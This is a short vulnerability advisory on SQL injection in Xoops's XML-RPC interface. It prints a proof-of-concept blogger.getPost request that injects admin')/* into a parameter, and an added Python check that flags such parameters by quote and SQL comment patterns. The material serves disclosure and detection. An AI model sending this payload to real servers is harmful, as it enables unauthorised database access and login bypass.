
Xoops XMLRPC Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concept is available:
<?xml version="1.0"?>
<methodCall>
<methodName>blogger.getPost</methodName>
<params>
<param>
<value><string></string></value>
</param>
<param>
<value><string></string></value>
</param>
<param>
<value><string>admin')/*</string></value>
</param>
<param>
<value><string>passwordfield</string></value>
</param>
<param>
<value><string></string></value>
</param>
</params>
</methodCall>
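
A detection check for the request shape shown above, as an added example that is not part of the original advisory: it parses an XML-RPC request body and reports which parameter positions carry quote or SQL comment characters. The function name, the two heuristic rules and the benign sample request are assumptions made for this illustration.

```python
import re
import xml.etree.ElementTree as ET

# Request body taken from the proof of concept above (whitespace condensed).
POC_BODY = b"""<?xml version="1.0"?>
<methodCall><methodName>blogger.getPost</methodName><params>
<param><value><string></string></value></param>
<param><value><string></string></value></param>
<param><value><string>admin')/*</string></value></param>
<param><value><string>passwordfield</string></value></param>
<param><value><string></string></value></param>
</params></methodCall>"""

# Constructed benign request, used only for comparison.
BENIGN_BODY = b"""<?xml version="1.0"?>
<methodCall><methodName>blogger.getPost</methodName><params>
<param><value><string>editor</string></value></param>
<param><value>42</value></param>
</params></methodCall>"""

# Heuristics chosen for this example; not a complete SQL injection signature set.
RULES = {
    "quote": re.compile(r"['\"`]"),
    "comment-opener": re.compile(r"/\*|--"),
}


def scan_xmlrpc(body: bytes):
    """Return (method_name, findings); each finding is (position, value, rule_names)."""
    # XML-RPC needs no DTD, so refuse one instead of letting the parser expand entities.
    if re.search(rb"<!\s*(DOCTYPE|ENTITY)", body, re.I):
        raise ValueError("DTD not allowed in an XML-RPC request")
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    method = (root.findtext("methodName") or "").strip()
    findings = []
    for pos, param in enumerate(root.findall("./params/param"), start=1):
        # itertext() also collects text nested inside <struct> and <array> values.
        value = "".join(param.itertext()).strip()
        hits = [name for name, rx in RULES.items() if rx.search(value)]
        if hits:
            findings.append((pos, value, hits))
    return method, findings
```

Run against the proof of concept, the check flags the third parameter; the benign request produces no findings. Matching on characters is a logging and alerting aid only, since legitimate values such as passwords can contain quotes.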







 

Copyright 2009, SecurityFocus